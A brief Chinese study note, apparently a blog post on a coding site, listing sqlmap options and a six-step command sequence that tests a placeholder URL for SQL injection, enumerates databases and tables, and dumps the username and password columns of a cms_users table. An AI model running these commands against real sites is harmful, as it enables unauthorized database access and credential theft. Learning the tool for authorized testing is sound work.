SQLmap的简单学习

2021/03/29 SQLmap的简单学习

Sqlmap参数参数含义

  1. -u “url”检测注入点
  2. –dbs 列出所有数据库的名字–
  3. current-d b列出当前数据库的名字
  4. -D 指定一个数据库
  5. –tables 列出表名
  6. -T 指定表名
  7. –columns 列出所有的字段名
  8. -C 指定字段
  9. –dump 列出字段内容

第一步 检测注入点sqlmap -u "目标URL"

第二步 列出所有数据库的名字sqlmap -u 目标URL --dbs

第三步 列出当前数据库的名字
sqlmap -u 目标URL --current-db

第四步 列出表名
sqlmap -u 目标URL -D cms --tables

第五步 列出所有的字段名
sqlmap -u 目标URL -D cms --tables -T cms_users --columns

第六步 列出字段内容
sqlmap -u 目标URL -D cms -T cms_users -C "username,password" --dump

学习地址:https://blog.csdn.net/qq_41901122/article/details/104425749

全部评论

相关推荐

点赞 评论 收藏
转发
点赞 收藏 评论
分享
牛客网
牛客企业服务